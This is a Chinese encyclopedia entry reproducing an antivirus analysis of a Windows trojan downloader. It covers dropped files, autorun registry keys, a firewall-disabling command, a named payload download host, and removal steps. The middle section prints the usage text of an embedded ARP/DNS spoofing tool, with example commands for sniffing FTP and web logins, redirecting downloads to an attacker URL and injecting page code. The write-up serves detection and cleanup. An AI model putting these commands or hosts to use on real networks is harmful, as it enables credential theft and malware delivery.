| 词条 | Trojan-Downloader.Win32.Agent.bmp |
| 释义 | 病毒名称: Trojan-Downloader.Win32.Agent.bmp 病毒类型: 木马 文件 MD5: E2C32E4E0CD6205C4654C98C152EAB6E 公开范围: 完全公开 危害等级: 5 文件长度: 45,233 字节 感染系统: windows98以上版本 开发工具: Borland Delphi 6.0 - 7.0 加壳类型: FSG 2.0 病毒描述: 该病毒属木马类, 病毒运行后衍生病毒文件到系统目录下,并删除自身;修改注册表,添 加启动项,以达到随机启动的目的;修改系统时间为 2002 年 3 月 3 日 19 点 02 分;感染 htm/asp/php 文件,在文件尾部插入代码;遍历盘符,在指定路径下创建文本文件,以记录相关 信息;指定注册表启动项,但未全部执行;连接网络,下载大量病毒文件到本机运行,该病毒下 载的文件可引起 DNS 欺骗。 行为分析: 1 、病毒运行后衍生病毒文件到系统目录下,并删除自身: %system32%\\softmuma.exe 2 、修改注册表,添加启动项,以达到随机启动的目的: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : "Mick"="C:\\WINDOWS\\system32\\softmuma.exe" 3 、修改系统时间为: 2002 年 3 月 3 日 19 点 02 分 4 、感染 htm/asp/php 文件,在文件尾部插入以下代码: 5 、遍历盘符,在指定路径下创建文本文件,以记录相关信息: "c:/" "C:\\Program Files\etMeeting\\c.txt" "d:/" "C:\\Program Files\etMeeting\\d.txt" "e:/" "C:\\Program Files\etMeeting\\e.txt" "f:/" "C:\\Program Files\etMeeting\\f.txt" "g:/" "C:\\Program Files\etMeeting\\g.txt" 6 、 关闭系统防火墙服务,以降低系统安全性能: 在后台打开 cmd 用命令 c net stop sharedaccess 关闭系统防火墙服务 7 、指定注册表启动项,但未全部执行: "Software\\Microsoft\\Windows\\CurrentVersion\\Run" "c:\\windows\\1.exe" "c:\\windows\\2.exe" "c:\\windows\\3.exe" "c:\\windows\\4.exe" "c:\\windows\\5.exe" "c:\\windows\\6.exe" "c:\\windows\\7.exe" "c:\\windows\\8.exe" "c:\\windows\\9.exe" "c:\\windows\\10.exe" "c:\\windows\\11.exe" "c:\\windows\\12.exe" "c:\\windows\\13.exe" "c:\\windows\\14.exe" "c:\\windows\\15.exe" "c:\\windows\\16.exe" 8 、连接网络,下载病毒文件到本机运行: IP : 59.34.198.33( 广东省湛江市 电信 ) 域名: 0001.0168168.cn 下载地址: 0001.0168168.cn/1.exe 0001.0168168.cn/*.* 下载的病毒运行后衍生的文件: %WINDIR%\\11.exe %WINDIR%\\13.exe %WINDIR%\\winform.exe %system32%\\dh2104.dll %system32%\\moyu103.dll %system32%\\msfeed.exe %system32%\\mydata.exe %system32%\wizdh.exe %system32%\wizqjsj.dll %system32%\wizqjsj.exe %system32%\wizzhuxians.dll %system32%\wizzhuxians.exe %system32%\\packet.dll %system32%\\ravasktao.dll %system32%\\ravasktao.exe %system32%\\sevices.exe %system32%\\softmuma.exe %system32%\\visin.exe %system32%\\wanpacket.dll %system32%\\winform.dll %system32%\\wpcap.dll %system32%\\ztinetzt.dll %system32%\\ztinetzt.exe %system32%\\drivers\pf.sys %system32%\\drivers\\usbinte.sys %Program Files%\\Internet Explorer\\PLUGINS\\System64.Sys %Temp%\\rxso.exe %Temp%\\tlso.exe %Temp%\\wgso.exe %Temp%\\wlso.exe %Temp%\\woso.exe 9 、下载的病毒增加的注册表启动项: HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\ {754FB7D8-B8FE-4810-B363-A788CD060F1F}\\InProcServer32 键值 : 字串 : "@"="C:\\Program Files\\Internet Explorer\\PLUGINS\\System64.Sys" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\ Installed Components\\{11716107-A10D-11cf-64CD-11115FE1CF41} 键值 : 字串 : "StubPath"="C:\\WINDOWS\\system32\wizzhuxians.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\ Installed Components\\{6A202101-A04D-21cf-65CD-31FF5FE1CF20} 键值 : 字串 : "StubPath"="C:\\WINDOWS\\system32\\mydata.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ policies\\Explorer\\Run 键值 : 字串 : "visin"="C:\\WINDOWS\\system32\\visin.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : " Microsoft Autorun1"="C:\\WINDOWS\\system32\wizdh.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : " Microsoft Autorun14"="C:\\WINDOWS\\system32\\ztinetzt.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : "Microsoft Autorun7"="C:\\WINDOWS\\system32\wizqjsj.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : "Microsoft Autorun9"="C:\\WINDOWS\\system32\\Ravasktao.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : "rxsa"="C:\\DOCUME~1\\COMMAN~1\\LOCALS~1\\Temp\\rxso.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : "tlsa"="C:\\DOCUME~1\\COMMAN~1\\LOCALS~1\\Temp\\tlso.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : "wgsa"="C:\\DOCUME~1\\COMMAN~1\\LOCALS~1\\Temp\\wgso.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : "WinForm"="C:\\WINDOWS\\WinForm.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : "wlsa"="C:\\DOCUME~1\\COMMAN~1\\LOCALS~1\\Temp\\wlso.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 键值 : 字串 : "wosa"="C:\\DOCUME~1\\COMMAN~1\\LOCALS~1\\Temp\\woso.exe" HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\PF 键值 : 字串 : "ImagePath"="system32\\drivers\pf.sys" 10 、该病毒下载的病毒可引起 DNS 欺骗: Content-Encoding: Transfer-Encoding: Content-Type: text/htmlHTTP/1.0 200HTTP/1.1 200DNS 欺骗 ( 修改应答包 ) %s -> %d.%d.%d.%d DNS欺骗(构建应答包) %s -> %d.%d.%d.%d pmac == NULL ?????? %d.%d.%d.%d -> %d.%d.%d.%d [!] ProcessPacket -> send packet error. %d [!] Forward thread send packet error memory lack. Scanning Alive Host...... %d: %15s %.2X-%.2X-%.2X-%.2X-%.2X-%.2X %s Found Alive Host: N/A[-] Get %s mac Error. No interfaces found! Make sure WinPcap is installed. Default Gateway . . : %s Physical Address. . : %.2X-%.2X-%.2X-%.2X-%.2X-%.2X %d. %s IP Address. . . . . : %s Error in pcap_findalldevs: %s [*] Bind on %s %s... Unable to open the adapter.%s is not supported by WinPcap Bye! Restoring the ARPTable...... Killing the SpoofThread...... Ctrl+C Is Pressed. options: -idx [index] 网卡索引号 -ip [ip] 欺骗的IP,用'-'指定范围,','隔开 -sethost [ip] 默认是网关,可以指定别的IP -port [port] 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口 -reset 恢复目标机的ARP表 -hostname 探测主机时获取主机名信息 -logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字, ','隔开关键字,多个条件'|'隔开 所有带+前缀的关键字都出现的包则写入 文件 带-前缀的关键字出现的包不写入文件 带_前缀的关键字一个符合则写入 文件(如有+-条件也要符合) -save_a [filename] 将捕捉到的数据写入文件 ACSII模式 -save_h [filename] HEX模式 -hacksite [ip] 指定要插入代码的站点域名或IP, 多个可用','隔开, 没指定则影响所有站点 -insert [html code]指定要插入html代码 -postfix [string] 关注的后缀名,只关注HTTP/1.1 302 -hackURL 发现关注的后缀名后修改URL到新的URL -filename [name] 新URL上有效的资源文件名 -hackdns [string] DNS欺骗,只修改UDP的报文,多个可用','隔开 格式: 域名|IP, www.aa.com|222.22.2.2,www.bb.com|1.1.1.1 -Interval [ms] 定时欺骗的时间间隔,单位:毫秒:默认是3000 ms -spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者(默认) -speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB example: 嗅探指定的IP段中端口80的数据,并以HEX模式写入文件 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件 zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log 用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探 zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log 如果嗅探到目标下载文件后缀是exe等则更改Location:为 http://xx.net/test.exe zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe 指定的IP段中的用户访问到-hacksite中的网址则只显示 just for fun zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun" 指定的IP段中的用户访问的所有网站都插入一个框架代码 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "" 指定的两个IP的总带宽限制到20KB zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20 DNS欺骗 zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1" 注: % System% 是一个可变路径。病毒通过查询操作系统来决定当前 System 文件夹的位置。 Windows2000/NT 中默认的安装路径是 C:\\Winnt\\System32 , windows95/98/me 中默认的安装 路径是 C:\\Windows\\System , windowsXP 中默认的安装路径是 C:\\Windows\\System32 。 清除方案: 1 、 使用安天木马防线可彻底清除此病毒 ( 推荐 ) 2 、 手工清除请按照行为分析删除对应文件,恢复相关系统设置。 (1)使用 安天木马防线 “进程管理”关闭病毒进程。 (2)删除病毒文件: %system32%\\softmuma.exe %WINDIR%\\11.exe %WINDIR%\\13.exe %WINDIR%\\winform.exe %system32%\\dh2104.dll %system32%\\moyu103.dll %system32%\\msfeed.exe %system32%\\mydata.exe %system32%\wizdh.exe %system32%\wizqjsj.dll %system32%\wizqjsj.exe %system32%\wizzhuxians.dll %system32%\wizzhuxians.exe %system32%\\packet.dll %system32%\\ravasktao.dll %system32%\\ravasktao.exe %system32%\\sevices.exe %system32%\\softmuma.exe %system32%\\visin.exe %system32%\\wanpacket.dll %system32%\\winform.dll %system32%\\wpcap.dll %system32%\\ztinetzt.dll %system32%\\ztinetzt.exe %system32%\\drivers\pf.sys %system32%\\drivers\\usbinte.sys %Program Files%\\Internet Explorer\\PLUGINS\\System64.Sys %Temp%\\rxso.exe %Temp%\\tlso.exe %Temp%\\wgso.exe %Temp%\\wlso.exe %Temp%\\woso.exe (3)恢复病毒修改的注册表项目,删除病毒添加的注册表项: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 : "Mick"="C:\\WINDOWS\\system32\\softmuma.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{754FB7D8- B8FE-4810-B363-A788CD060F1F}\\InProcServer32 键值 : 字串 : "@"="C:\\Program Files\\Internet Explorer\\ PLUGINS\\System64.Sys" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\ Installed Components\\ {11716107-A10D-11cf-64CD-11115FE1CF41} 键值 : 字串 : "StubPath"="C:\\WINDOWS\\system32\wizzhuxians.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\ Installed Components\\ {6A202101-A04D-21cf-65CD-31FF5FE1CF20} 键值 : 字串 : "StubPath"="C:\\WINDOWS\\system32\\mydata.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\policies\\Explorer\\Run 键值 : 字串 : "visin"="C:\\WINDOWS\\system32\\visin.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 : " Microsoft Autorun1"= "C:\\WINDOWS\\system32\wizdh.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 : " Microsoft Autorun14"= "C:\\WINDOWS\\system32\\ztinetzt.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 : "Microsoft Autorun7"= "C:\\WINDOWS\\system32\wizqjsj.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 : "Microsoft Autorun9"= "C:\\WINDOWS\\system32\\Ravasktao.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 : "rxsa"= "C:\\DOCUME~1\\COMMAN~1\\LOCALS~1\\Temp\\rxso.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 :"tlsa"= "C:\\DOCUME~1\\COMMAN~1\\LOCALS~1\\Temp\\tlso.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 : "wgsa"= "C:\\DOCUME~1\\COMMAN~1\\LOCALS~1\\Temp\\wgso.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 : "WinForm"="C:\\WINDOWS\\WinForm.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 :"wlsa"= "C:\\DOCUME~1\\COMMAN~1\\LOCALS~1\\Temp\\wlso.exe" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\Run 键值 : 字串 : "wosa"= "C:\\DOCUME~1\\COMMAN~1\\LOCALS~1\\Temp\\woso.exe" HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\PF 键值 : 字串 : "ImagePath"="system32\\drivers\pf.sys" |
| 随便看 |
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。